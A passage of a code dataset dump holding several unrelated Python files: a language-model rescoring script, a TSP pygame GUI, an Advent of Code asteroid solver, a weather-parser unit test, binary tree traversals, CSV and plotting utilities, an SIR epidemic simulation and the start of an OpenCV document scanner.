open(args.nbest_file, \"r\", encoding=\"utf-8\") as reader:\n while True:\n line = reader.readline()\n if not line:\n break\n\n line = line.strip()\n tokens = line.split(\" \", 1)\n if len(tokens) == 1:\n tokens.append(args.sent_sep)\n\n all_ids.append(tokens[0])\n tmpfile.write(tokens[1] + '\\n')\n\ntmpfile.close()\n\n\ndef rescore(corpus, nbest_file, model, ext_len, mem_len, outfile):\n encoded_sent = corpus.vocab.encode_file(path=nbest_file, add_double_eos=True)\n for idx, sent in enumerate(encoded_sent):\n streams = [None] * 1\n bptt = len(list(sent)) - 1\n data = torch.LongTensor(bptt, 1)\n target = torch.LongTensor(bptt, 1)\n model.reset_length(bptt, ext_len, mem_len)\n n_retain = 0\n \n # data : [n_retain+bptt x bsz]\n # target : [bptt x bsz]\n data[n_retain:].fill_(-1)\n target.fill_(-1)\n for i in range(1):\n n_filled = 0\n while n_filled < bptt:\n if streams[i] is None or len(streams[i]) <= 1:\n streams[i] = sent\n # number 
of new tokens to fill in\n n_new = min(len(streams[i]) - 1, bptt - n_filled)\n # first n_retain tokens are retained from last batch\n data[n_retain + n_filled : n_retain + n_filled + n_new, i] = \\\n streams[i][:n_new]\n target[n_filled: n_filled + n_new, i] = streams[i][1: n_new + 1]\n streams[i] = streams[i][n_new:]\n n_filled += n_new\n\n data = data.to(device)\n target = target.to(device)\n model.eval()\n mems = tuple()\n with torch.no_grad():\n ret = model(data, target, *mems)\n loss = ret[0]\n loss = loss.sum()\n sent_rescore = ''\n sent_rescore = all_ids[idx] + ' ' + str(loss.item())\n outfile.write(sent_rescore + '\\n')\n\n\ncorpus = get_lm_corpus(args.data, args.dataset)\nmodel_dirs = args.models.split()\nfor model_dir in model_dirs:\n # Load the best saved model.\n model = None\n with open(os.path.join(args.work_dir, model_dir, 'model.pt'), 'rb') as f:\n model = torch.load(f)\n\n model.backward_compatible()\n model = model.to(device)\n\n if args.clamp_len > 0:\n model.clamp_len = args.clamp_len\n \n if args.same_length:\n model.same_length = True\n \n with open(os.path.join(args.out_dir, os.path.basename(args.nbest_file) + '-' + model_dir), 'w', encoding='utf-8') as outfile:\n rescore(corpus, args.nbest_file, model, args.ext_len, args.mem_len, outfile)\n\n","sub_path":"pytorch/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"230696448","text":"import getopt\nimport sys\nimport os\nfrom Problem import Problem\nfrom Town import Town\n\n\nfrom pygame.locals import KEYDOWN, QUIT, MOUSEBUTTONDOWN, K_RETURN, K_ESCAPE\nfont = None\nscreen = None\nfontTown = None\nfont_color = None\nproblem = None\ndef showSolution(problem):\n import pygame\n from Problem import Problem\n from Town import Town\n from Solution import Solution\n\n import sys\n\n screen_x = 500\n screen_y = 500\n\n font_color = [255,255,255] # white\n\n pygame.init()\n pygame.display.set_mode((screen_x, screen_y))\n pygame.display.set_caption('Exemple')\n\n screen = pygame.display.get_surface()\n font = pygame.font.Font(None,30)\n fontTown = pygame.font.Font(None,15)\n\n screen.fill(0)\n listPos = [town.pos for town in problem.best_solution]\n pygame.draw.lines(screen,Town.town_color,True,listPos)\n\n for town in problem.best_solution:\n town.draw(screen,fontTown,font_color)\n\n text = font.render(\"Distance : \"+\"{:.4f}\".format(problem.best_solution.distance), True, font_color)\n textRect = text.get_rect()\n screen.blit(text, textRect)\n pygame.display.flip()\n\n while True:\n event = pygame.event.wait()\n if event.type == KEYDOWN: break\n\ndef parse(file):\n problem = Problem([])\n with open(file, 'r+') as f:\n for l in f.readlines():\n town = l.split()\n x = int(town[1])\n y = int(town[2])\n type(x)\n problem.addTown(Town( x, y, town[0]))\n return problem\n\ndef getTowns():\n import pygame\n from Problem import Problem\n from Town import Town\n\n from pygame.locals import KEYDOWN, QUIT, MOUSEBUTTONDOWN, K_RETURN, K_ESCAPE\n import sys\n\n screen_x = 500\n screen_y = 500\n\n font_color = [255,255,255] # white\n list = []\n problem = Problem(list)\n\n pygame.init()\n pygame.display.set_mode((screen_x, screen_y))\n pygame.display.set_caption('Exemple')\n screen = pygame.display.get_surface()\n font = pygame.font.Font(None,30)\n\n problem.draw(screen, font, font_color)\n\n collecting = True\n size = 0\n townName = \"Town\"\n while collecting:\n for event in pygame.event.get():\n if event.type 
== QUIT:\n sys.exit(0)\n elif event.type == KEYDOWN and event.key == K_RETURN:\n collecting = False\n elif event.type == MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n problem.addTown(Town(pos[0], pos[1], townName+str(size)))\n size += 1\n problem.draw(screen, font, font_color)\n return problem\n\ndef ga_solve(file=None, gui=True, maxtime=0):\n global problem\n if file is not None:\n problem = parse(file)\n else:\n if gui is True:\n problem = getTowns()\n else:\n print(\"No gui, and no file passed as argument\")\n exit()\n print (\"solving\")\n problem.solve(gui, maxtime)\n print (\"solved\")\n\n\ndef showDoc():\n print(__doc__)\n\ndef get_params():\n \"\"\"\n Get the arguments from the command line\n \"\"\"\n import argparse\n gui = True\n maxtime = 0\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\",\"--nogui\", help=\"disables gui\",action=\"store_true\")\n parser.add_argument(\"-m\",\"--maxtime\", help=\"sets a maximum time\")\n parser.add_argument(\"filename\", type=str, help=\"the name of the file containing a list of towns\", nargs=\"?\")\n\n args = parser.parse_args()\n if args.nogui is not None:\n gui = not args.nogui\n if args.maxtime is not None:\n maxtime = args.maxtime\n\n return gui, maxtime, args.filename\n\nif __name__ == \"__main__\":\n (GUI, MAX_TIME, FILENAME) = get_params()\n print(\"Parameters( gui: %s maxtime: %s filename: %s)\" % (GUI, MAX_TIME, FILENAME))\n ga_solve(FILENAME,GUI,MAX_TIME)\n\n if GUI is True :\n showSolution(problem)\n #ga_solve(\"./data/pb020.txt\",True,5)\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"557533974","text":"from helpers import *\nimport math\nimport pdb\nfrom colorama import init, Fore, Style\n\n\ndef factors(a):\n f = set(\n [1]\n ) # this is sort of incorrect, but it solves the 0 case and everyone has a 1 in their factors anyway\n\n for i in range(1, int(math.sqrt(abs(a))) + 1):\n if (abs(a) % i) == 0:\n f.add(i)\n f.add(abs(a) // i)\n if a < 0:\n for i in f.copy():\n f.add(-i)\n return f\n\n\ndef gcf(a, b):\n if a == 0 or b == 0:\n a, b = a + b, a + b\n fa = factors(a)\n fb = factors(b)\n return int(max(list(fa & fb)))\n\n\ndef printgrid(grid):\n x_max = max([k[0] for k in grid.keys()])\n y_max = max([k[1] for k in grid.keys()])\n\n for y in range(y_max + 1):\n for x in range(x_max + 1):\n if grid[(x, y)] == \"*\":\n print(Fore.RED + grid[(x, y)] + Fore.RESET, end=\"\")\n elif grid[(x, y)] == \"x\":\n print(Fore.LIGHTBLACK_EX + grid[(x, y)] + Fore.RESET, end=\"\")\n elif grid[(x, y)] == \".\":\n print(Fore.LIGHTBLACK_EX + grid[(x, y)] + Fore.RESET, end=\"\")\n else:\n print(grid[(x, y)], end=\"\")\n print()\n print(f'Number of Visible Asteroids: {list(grid.values()).count(\"#\")}\\n\\n')\n\n\ndef problem1(problem_input):\n grid = dict()\n\n for y, line in enumerate(problem_input):\n for x, val in enumerate(line):\n grid[(x, y)] = val\n\n print(f'Astroid Count: {list(grid.values()).count(\"#\")}')\n asteroid_locations = {k: 0 for k, v in grid.items() if v == \"#\"}\n\n for base_location in asteroid_locations.keys():\n working_grid = grid.copy()\n working_grid[\n base_location\n ] = \"*\" # <- base Location = *, Astroids we see = #, astroids we dont see = x\n # pdb.set_trace()\n for asteroid in asteroid_locations.keys():\n if working_grid[asteroid] in \"x*.\":\n continue\n else:\n # we have a '#'\n step = asteroid[0] - base_location[0], asteroid[1] - base_location[1]\n div = 
gcf(step[0], step[1])\n # print(f'Base to Asteroid: {step} Compiles to: {(step[0]//div, step[1]//div)}')\n step = step[0] // div, step[1] // div\n\n test = asteroid[0] + step[0], asteroid[1] + step[1]\n while test in working_grid:\n if working_grid[test] == \"#\":\n working_grid[test] = \"x\"\n test = test[0] + step[0], test[1] + step[1]\n asteroid_locations[base_location] = list(working_grid.values()).count(\"#\")\n if asteroid_locations[base_location] == 282:\n print(\"Base Location: \", base_location)\n\n # printgrid(working_grid)\n return max(list(asteroid_locations.values()))\n\n\ndef distance(a, b):\n dx = a[0] - b[0]\n dy = a[1] - b[1]\n return math.sqrt(dx ** 2 + dy ** 2)\n\n\ndef angle(src, dest):\n\n dx = dest[0] - src[0]\n dy = dest[1] - src[1]\n\n if dy == 0:\n if dx > 0:\n return math.pi / 2\n return math.pi * 3 / 2\n\n if dx == 0:\n if dy < 0:\n return 0\n return math.pi\n\n if dx > 0 and dy < 0:\n return math.atan(dx / -dy)\n if dx > 0 and dy > 0:\n return math.pi / 2 + math.atan(dy / dx)\n if dx < 0 and dy > 0:\n return math.pi + math.atan(-dx / dy)\n if dx < 0 and dy < 0:\n return math.pi * 3 / 2 + math.atan(-dy / -dx)\n return math.atan(dx / -dy)\n\n\ndef do_angle_test():\n src = 0, 0\n dsts = [\n (0, -5),\n (2.5, -5),\n (5, -5),\n (5, 0),\n (5, 2.5),\n (5, 5),\n (0, 5),\n (-2.5, 5),\n (-5, 5),\n (-5, 0),\n (-5, -2.5),\n (-5, -5),\n ]\n\n dsts = []\n for x in range(8):\n dsts += [(x, -7)]\n\n for y in range(-7, 8):\n dsts += [(7, y)]\n\n for x in range(7, -8, -1):\n dsts += [(x, 7)]\n\n for y in range(7, -8, -1):\n dsts += [(-7, y)]\n\n for x in range(-7, 0):\n dsts += [(x, -7)]\n\n for dst in dsts:\n print(f\"{src} to {dst} is angel: {angle(src,dst)}\")\n\n\ndef dict_print(my_dict, inset_value=0):\n retval = \"\"\n for k, v in my_dict.items():\n retval += \" \" * inset_value\n retval += f\"{str(k)}: {str(v)}\\n\"\n print(retval)\n\n\ndef problem2(problem_input):\n\n grid = dict()\n\n for y, line in enumerate(problem_input):\n for x, val in enumerate(line):\n grid[(x, y)] = val\n\n base_location = 22, 19\n\n asteroid_targetting = dict()\n\n grid[base_location] = \"*\"\n\n for asteroid in [k for k, v in grid.items() if v == \"#\"]:\n asteroid_targetting[asteroid] = dict()\n asteroid_targetting[asteroid][\"r\"] = angle(base_location, asteroid)\n asteroid_targetting[asteroid][\"d\"] = distance(base_location, asteroid)\n\n # dict_print(asteroid_targetting)\n\n target_order = dict()\n for k, v in asteroid_targetting.items():\n if v[\"r\"] not in target_order:\n target_order[v[\"r\"]] = [k]\n else:\n target_order[v[\"r\"]] += [k]\n target_order[v[\"r\"]].sort(key=lambda x: asteroid_targetting[x][\"d\"])\n\n dict_print(target_order)\n\n printgrid(grid)\n\n kill_order = []\n\n while True:\n radii_order = list(target_order.keys())\n radii_order.sort()\n for r in radii_order:\n kill_order += [target_order[r].pop(0)]\n if len(kill_order) >= 200:\n return kill_order[-1]\n\n target_order == {k: v for k, v in target_order.items() if len(v) > 0}\n\n return\n for base_location in asteroid_locations.keys():\n print(f\"Investigating Astroid Base at {base_location}\")\n working_grid = grid.copy()\n working_grid[\n base_location\n ] = \"*\" # <- base Location = *, Astroids we see = #, astroids we dont see = x\n # pdb.set_trace()\n for asteroid in asteroid_locations.keys():\n if working_grid[asteroid] in \"x*.\":\n continue\n else:\n # we have a '#'\n step = asteroid[0] - base_location[0], asteroid[1] - base_location[1]\n div = gcf(step[0], step[1])\n # print(f'Base to Asteroid: {step} 
Compiles to: {(step[0]//div, step[1]//div)}')\n step = step[0] // div, step[1] // div\n\n test = asteroid[0] + step[0], asteroid[1] + step[1]\n while test in working_grid:\n if working_grid[test] == \"#\":\n working_grid[test] = \"x\"\n test = test[0] + step[0], test[1] + step[1]\n asteroid_locations[base_location] = list(working_grid.values()).count(\"#\")\n\n printgrid(working_grid)\n return max(list(asteroid_locations.values()))\n","sub_path":"aoc2019/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"466264013","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@package cgsn_parsers.tests.test_parse_metbk\n@file cgsn_parsers/tests/test_parse_metbk.py\n@author Christopher Wingard\n@brief Unit tests for parsing the METBK data\n\"\"\"\nimport numpy as np\nimport unittest\n\nfrom nose.plugins.attrib import attr\nfrom os import path\n\nfrom cgsn_parsers.parsers.parse_metbk import Parser\n\n# test data file created using chunks of data from various files with the\n# different cases of data we might encounter.\nTESTDATA = path.join(path.dirname(__file__), 'metbk/metbk.test.dat')\n\n\n@attr('parse')\nclass TestParsingUnit(unittest.TestCase):\n '''\n OOI Endurance and Pioneer moorings use a custom built system from WHOI to\n log data from a suite of meterological instruments with the data output\n once a minute. The test data used below comes from a few different log\n files, combined together to capture the diffent cases where missing data\n is identified by either a NaN, Na or N.\n '''\n def setUp(self):\n '''\n Load and parse the test METBK data and set the expected output array.\n '''\n # initialize Parser objects for the metbk types defined above.\n self.metbk = Parser(TESTDATA)\n\n # set the expected output array minus the date/time strings\n self.expected = np.array([\n [1021.22, np.nan, np.nan, 298.2, 14.05, 9.444, 3.1416, 40.0, np.nan, np.nan],\n [1021.49, np.nan, np.nan, 299.8, 14.03, 9.439, 3.1409, 79.6, np.nan, np.nan],\n [1020.94, np.nan, np.nan, 301.1, 14.06, 9.422, 3.1384, 80.2, np.nan, np.nan],\n [1023.22, 62.072, 3.418, 244.3, 4.40, 8.965, 3.0188, 2.1, -5.38, 2.03],\n [1023.15, 62.969, 3.485, 244.3, 4.29, 8.955, 3.0175, 2.3, -5.47, 2.48],\n [1023.15, 60.724, 3.380, 245.6, 4.40, 8.955, 3.0161, 2.2, -5.71, 1.31],\n [1020.12, np.nan, np.nan, 343.5, 14.03, 9.115, 3.0978, np.nan, -3.23, 4.32],\n [1020.94, np.nan, np.nan, 341.6, 14.01, 9.131, 3.0997, np.nan, -5.14, 4.22],\n [1020.94, np.nan, np.nan, 338.6, 13.97, 9.132, 3.0997, np.nan, -4.57, 4.06]])\n\n def test_parse_metbk(self):\n '''\n Test parsing of the METBK data\n '''\n self.metbk.load_ascii()\n self.metbk.parse_data()\n parsed = self.metbk.data.toDict()\n\n np.testing.assert_array_equal(parsed['barometric_pressure'], self.expected[:, 0])\n np.testing.assert_array_equal(parsed['relative_humidity'], self.expected[:, 1])\n np.testing.assert_array_equal(parsed['air_temperature'], self.expected[:, 2])\n np.testing.assert_array_equal(parsed['longwave_irradiance'], self.expected[:, 3])\n np.testing.assert_array_equal(parsed['precipitation_level'], self.expected[:, 4])\n np.testing.assert_array_equal(parsed['sea_surface_temperature'], self.expected[:, 5])\n np.testing.assert_array_equal(parsed['sea_surface_conductivity'], self.expected[:, 6])\n np.testing.assert_array_equal(parsed['shortwave_irradiance'], self.expected[:, 7])\n np.testing.assert_array_equal(parsed['eastward_wind_velocity'], 
self.expected[:, 8])\n np.testing.assert_array_equal(parsed['northward_wind_velocity'], self.expected[:, 9])\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cgsn_parsers/tests/test_metbk.py","file_name":"test_metbk.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"534512361","text":"from typing import List\nfrom collections import deque\n\nclass Node(object):\n def __init__(self, data, left_child=None, right_child=None):\n self.data = data\n self.left_child = left_child\n self.right_child = right_child\n\n def __str__(self):\n return str(self.data)\n\n\n# class Tree(object):\n# def __init__(self, root):\n# self.root = root\n#\n#\n# def add(self, elem):\n# node = Node(elem)\n# if self.root == None:\n# self.root = node\n# else:\n# queue = []\n# queue.append(self.root)\n# while queue:\n# cur = queue.pop(0)\n# if cur.left_child == None:\n# cur.left_child = node\n# return\n# elif cur.right_child == None:\n# cur.right_child = node\n# return\n# else:\n# queue.append(cur.right_child)\n# queue.append(cur.left_child)\ndef create(array: List):\n node = Node(data=None)\n if array is None or len(array) == 0:\n return None\n data = array.pop(0)\n if data != -1:\n node.data = data\n node.left_child = create(array)\n node.right_child = create(array)\n return node\n\n\ndef pre_order_search(tree):\n if tree is None:\n return\n print(tree.data)\n pre_order_search(tree.left_child)\n pre_order_search(tree.right_child)\n\n\ndef pre_order_search_with_stack(tree):\n stack = []\n tree_node = Node(tree.data, tree.left_child, tree.right_child)\n while stack or tree_node:\n while tree_node:\n print(tree.data)\n stack.append(tree_node.left_child)\n tree_node = tree_node.left_child\n if stack:\n tree_node = stack.pop()\n tree_node = tree_node.right_child\n\n\ndef mid_order_search(tree):\n if tree is None:\n return\n mid_order_search(tree.left_child)\n print(tree.data)\n mid_order_search(tree.right_child)\n\n\ndef last_order_search(tree):\n if tree is None:\n return\n last_order_search(tree.left_child)\n last_order_search(tree.right_child)\n print(tree.data)\n\n\ndef level_order_search(tree):\n search_queue = deque()\n # Represent nodes properly: reach the left and right children through the node object's references. Holding only the data makes it impossible to traverse and print.\n search_queue.append(Node(tree.data, tree.left_child, tree.right_child))\n while search_queue:\n node = search_queue.popleft()\n print(node)\n if node.left_child:\n search_queue.append(node.left_child)\n if node.right_child:\n search_queue.append(node.right_child)\n\n\nif __name__ == '__main__':\n # node1 = Node(\"A\", \"B\", \"C\")\n # node2 = Node(\"B\", None, \"D\")\n # node3 = Node(\"C\", \"E\", \"F\")\n # node4 = Node(\"E\", \"G\", None)\n # node5 = Node(\"F\", \"H\", \"I\")\n # build the tree from a list\n\n tree_list = [3, 2, 9, -1, -1, 10, -1, -1, 8, -1, 4]\n tree = create(tree_list)\n # pre_order_search(tree)\n # mid_order_search(tree)\n # last_order_search(tree)\n\n # pre_order_search_with_stack(tree)\n level_order_search(tree)\n # search_queue = deque()\n # search_queue += search_queue + Node\n # print(tree)\n\n # node1 = Node(15)\n # node2 = Node(7)\n # node3 = Node(20, node1, node2)\n # node4 = Node(9)\n # base = Node(3, node4, node3)\n","sub_path":"leetCode/binary_tree_search/DFS_binary_search.py","file_name":"DFS_binary_search.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"147391579","text":"# Title: MatchName\r\n# Version: 1.0\r\n# Author: 
Clayton Thompson\r\n# Date: Start: 8/1/2018 Complete: 8/1/2018 Last-Update: 8/3/2018\r\n# Python: Version 3.6\r\n# Purpose:\r\n\r\nimport csv\r\nimport re\r\n\r\n# From modified IRS data csv, extract records for SC only\r\n# Save to new csv file\r\nwith open(\"Outstanding.csv\", \"r\") as source:\r\n src = csv.reader(source)\r\n i = 1\r\n for s in src:\r\n i += 1\r\n with open(\"SCIRSdat.csv\", \"r\") as data:\r\n dat = csv.reader(data)\r\n for d in dat:\r\n if re.match(s[0].strip(), d[3], re.IGNORECASE):\r\n print(i)\r\n with open(\"Final1.csv\", \"a\", newline='') as result:\r\n wtr = csv.writer(result)\r\n wtr.writerow([s[0], s[1], s[2], s[3], s[4], s[5], s[6], s[7], s[8], s[9], s[10], s[11],\r\n s[12], s[13], s[14], s[15], s[16], s[17], d[8]])\r\n break\r\n","sub_path":"MatchName1.py","file_name":"MatchName1.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"649660260","text":"import argparse\nfrom matplotlib import cm\nfrom utils import get_logger\nimport pandas as pd\nfrom utils import read_file_contents_list\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\nlogger = get_logger('Plot')\n\n\ndef main():\n parser = argparse.ArgumentParser('Plot box and scatter data.')\n parser.add_argument('--in-csv', type=str)\n parser.add_argument('--thres-val', type=float)\n parser.add_argument('--out-fig', type=str)\n args = parser.parse_args()\n\n test_collection_df = pd.read_csv(args.in_csv)\n test_dict = test_collection_df.set_index('TestName').to_dict('index')\n\n num_test = len(test_dict)\n num_data = 50\n\n y_table = np.full((num_data, num_test), 1).astype(float)\n for test_idx, test_name in enumerate(test_dict):\n test_item = test_dict[test_name]\n test_df = pd.read_csv(test_item['CSV'])\n y_all = test_df[test_item['COLUMN']].to_numpy()\n y_table[:, test_idx] = y_all[:]\n\n fig, ax = plt.subplots(figsize=(num_test * 2 + 2, 8))\n plt.boxplot(y_table)\n\n # Add outliers as scatter points\n num_outlier = np.zeros(num_test)\n mean_val = np.zeros(num_test)\n # kp_val = np.zeros(num_test)\n outlier_data = []\n for test_idx, test_name in enumerate(test_dict):\n test_item = test_dict[test_name]\n test_df = pd.read_csv(test_item['CSV'])\n data_dict = test_df.set_index('Scan').to_dict('index')\n outlier_list = read_file_contents_list(test_item['OUTLIER'])\n num_outlier[test_idx] = len(outlier_list)\n scan_list = test_df['Scan'].to_list()\n column_flag = test_item['COLUMN']\n x_out_all, y_out_all = get_x_y_outlier_list(data_dict,\n column_flag,\n scan_list,\n test_idx + 1)\n # kp_val[test_idx] = data_dict[outlier_list[0]][column_flag]\n mean_val[test_idx] = np.mean(y_out_all)\n plt.scatter(x_out_all, y_out_all, color='r', alpha=0.5)\n\n x_out, y_out = get_x_y_outlier_list(data_dict,\n column_flag,\n outlier_list,\n test_idx + 1)\n outlier_data.append(y_out)\n\n # plot outlier as connected dots\n # for outlier_idx in range(int(num_outlier[0])):\n # y_val = [outlier_data[test_idx][outlier_idx] for test_idx in range(num_test)]\n # plt.plot(range(1, len(y_val) + 1), y_val, linestyle='--', marker='o', color='b')\n\n labels = [item.get_text() for item in ax.get_xticklabels()]\n for test_idx, test_name in enumerate(test_dict):\n mean = float(\"{:.5f}\".format(mean_val[test_idx]))\n # kp = float(\"{:.5f}\".format(kp_val[test_idx]))\n # labels[test_idx] = f'{test_name} \\noutlier {int(num_outlier[test_idx])}/{num_data}\\nmean {mean}'\n labels[test_idx] = f'{test_name} \\nmean {mean}'\n # 
labels[test_idx] = f'{test_name}\\n KP1 Lung DSC {kp}'\n ax.set_xticklabels(labels)\n\n # Threshold.\n print(f'Thres: {args.thres_val}')\n plt.axhline(y=args.thres_val, color='r', linestyle='--')\n\n logger.info(f'Save plot to {args.out_fig}')\n plt.grid()\n plt.savefig(args.out_fig)\n\n\ndef get_x_y_outlier_list(data_dict, column_flag, outlier_list, x_idx):\n y_outlier = [data_dict[file_name][column_flag] for file_name in outlier_list]\n x_outlier = np.random.normal(x_idx, 0.01, len(y_outlier))\n\n return x_outlier, y_outlier\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/get_combined_box_and_outlier_scatter_w_csv.py","file_name":"get_combined_box_and_outlier_scatter_w_csv.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"568188499","text":"#check whether given input is palindrome or not....\r\n\r\ndef pal(strn):\r\n strn2= strn[::-1]\r\n if strn==strn2:\r\n print(\"Input is palindrome...\")\r\n else:\r\n print(\"Not a palindrome\")\r\n \r\n\r\nstring = input(\"Enter the input: \")\r\nif len(string)!=0:\r\n pal(string)\r\nelse:\r\n print(\"Invalid input! Input string...\")\r\n","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"261647672","text":"\"\"\"\nExtract page properties information from an (gross, icky) SQL file.\n\nUsage:\n extract_page_properties (-h|--help)\n extract_page_properties []...\n [--processes=]\n [--debug]\n [--verbose]\n\n\nOptions:\n -h, --help Print this help message\n Path to SQL file to process. If no file is provided,\n read stdin.\n --processes= The number of parallel processes to run\n [default: ]\n --debug Print debug logging to stderr\n --verbose Print dots and stuff to stderr\n\"\"\"\nimport gzip\nimport json\nimport logging\nimport sys\nfrom multiprocessing import cpu_count\n\nimport docopt\nimport para\n\nfrom page_prop_dump import PagePropDump\n\nlogger = logging.getLogger(__name__)\n\n\ndef main(argv=None):\n args = docopt.docopt(__doc__)\n logging.basicConfig(\n level=logging.WARNING if not args['--debug'] else logging.DEBUG,\n format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'\n )\n\n if len(args['']) == 0:\n logger.info(\"Reading from \")\n sql_files = [sys.stdin]\n else:\n sql_files = args['']\n\n if args['--processes'] == \"\":\n processes = cpu_count()\n else:\n processes = int(args['--processes'])\n\n verbose = args['--verbose']\n\n run(sql_files, processes, verbose)\n\n\ndef run(sql_files, processes, verbose):\n\n def extract_from_sql_file(path):\n if isinstance(path, str):\n logger.debug(\"Opening {0}\".format(path))\n f = gzip.open(path, 'rt', errors='replace')\n else:\n logger.debug(\"Reading from {0}\".format(path))\n f = path\n dump = PagePropDump.from_sql_file(f)\n for sitelink_usage in dump.usages:\n yield sitelink_usage\n\n usages = para.map(extract_from_sql_file, sql_files, mappers=processes)\n for i, sitelink_usage in enumerate(usages):\n json.dump(sitelink_usage.to_json(), sys.stdout)\n sys.stdout.write(\"\\n\")\n\n if verbose and i % 1000 == 0:\n sys.stderr.write(\".\")\n 
sys.stderr.flush()\n\nmain()\n\n\n","sub_path":"python_analysis_scripts/entity_usage_on_corresponding_articles/extract_page_properties.py","file_name":"extract_page_properties.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"639495800","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 15 11:44:07 2020\n\n@author: gongmeiting\n\"\"\"\n\n#A simply SIR model\n#import necessary libraries\n#define the basic variables of the model\n#creat arrays for each variables to track how they evolve over time \n#record the output of each time step\n#plot the result\n#save plots as a file\n\n\n#import necessary libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\n#the total population is 10000\n#define the basic variables of the model\nI=1\n#I represents infected people\nS=9999\n#S represents susceptible individuals \nR=0\n#R represents recovered people\nN=S+I+R\n#N represents total people\nbeta=0.3\n#beta is infection probability\ngamma=0.05\n#gamma is recovery probability\n#creat arrays for each variables to track how they evolve over time \ni=[I]\ns=[S]\nr=[R]\n#loop over 1000 time points\ntime=1000\nfor e in range(1,time+1):\n real_beta=beta*I/N\n # For a susceptible individual to be infected,\n # we consider not only the infection rate upon contact (beta), \n # but also the probability of making contact with an infected individual.\n si=list(np.random.choice(range(2),S,p=[1-real_beta,real_beta])).count(1)\n #si represents the people who are new infected \n #we choose numbers from range(2) (i.e. 0 or 1) S times,\n #with a probability of 1-real_beta of choosing 0 \n #and a probability of real_beta of choosing 1\n S=S-si\n I=I+si\n ir=list(np.random.choice(range(2),I,p=[1-gamma,gamma])).count(1)\n #ir represents the people who ae new recovered\n #we choose numbers from range(2) (i.e. 
0 or 1) I times,\n #with a probability of 1-gamma of choosing 0 \n #and a probability of gamma of choosing 1\n I=I-ir\n R=R+ir\n #add elements to arrays\n s.append(S)\n i.append(I)\n r.append(R)\n#set up the dimensions and resolution of plot\nplt.figure(figsize=(6,4),dpi =150)\n#set up xlabel, ylabel, title etc\nplt.xlabel('time')\nplt.ylabel('population')\nplt.title('SIR model')\nplt.plot(list(range(time+1)), s, 'b',label='Susceptible')\nplt.plot(list(range(time+1)), i, 'r',label='Infected')\nplt.plot(list(range(time+1)), r, 'g',label='Recovered')\nlegend = plt.legend(loc='upper right')\nplt.savefig(\"SIR\",type='png')\nplt.show()\n#by trial, I find that running the code several times produces different results","sub_path":"Practical 12 Modelling infections/SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"505905984","text":"\"\"\"Document Scanner\"\"\"\nimport cv2 as cv\nimport numpy as np\nimport os\n\n#cap = cv.VideoCapture(0) #0 is id of camera in your laptop\n# the id's of height, width, brightness is here https://docs.opencv.org/3.4/d4/d15/group__videoio__flags__base.html#gaeb8dd9c89c10a5c63c139bf7c4f5704d\n#imageWidth = 480\n#imageHeight = 640\n\n# cap.set(3,imageWidth)\n# cap.set(4,imageWidth)\n# cap.set(10,150)\nfile_path = os.path.dirname(__file__)\nimg = cv.imread(file_path + '/document.jpg')\nimageHeight, imageWidth = img.shape[:2]\n\n\ndef stackImages(scale,imgArray):\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n width = imgArray[0][0].shape[1]\n height = imgArray[0][0].shape[0]\n if rowsAvailable:\n for x in range ( 0, rows):\n for y in range(0, cols):\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:\n imgArray[x][y] = cv.resize(imgArray[x][y], (0, 0), None, scale, scale)\n else:\n imgArray[x][y] = cv.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv.cvtColor( imgArray[x][y], cv.COLOR_GRAY2BGR)\n imageBlank = np.zeros((height, width, 3), np.uint8)\n hor = [imageBlank]*rows\n hor_con = [imageBlank]*rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n ver = np.vstack(hor)\n else:\n for x in range(0, rows):\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\n imgArray[x] = cv.resize(imgArray[x], (0, 0), None, scale, scale)\n else:\n imgArray[x] = cv.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv.cvtColor(imgArray[x], cv.COLOR_GRAY2BGR)\n hor= np.hstack(imgArray)\n ver = hor\n return ver\n\n\n\n\n\n\ndef getContours(img):\n biggest = np.array([])\n maxArea = 0\n #external - outer details in RETR EXTERNAL\n 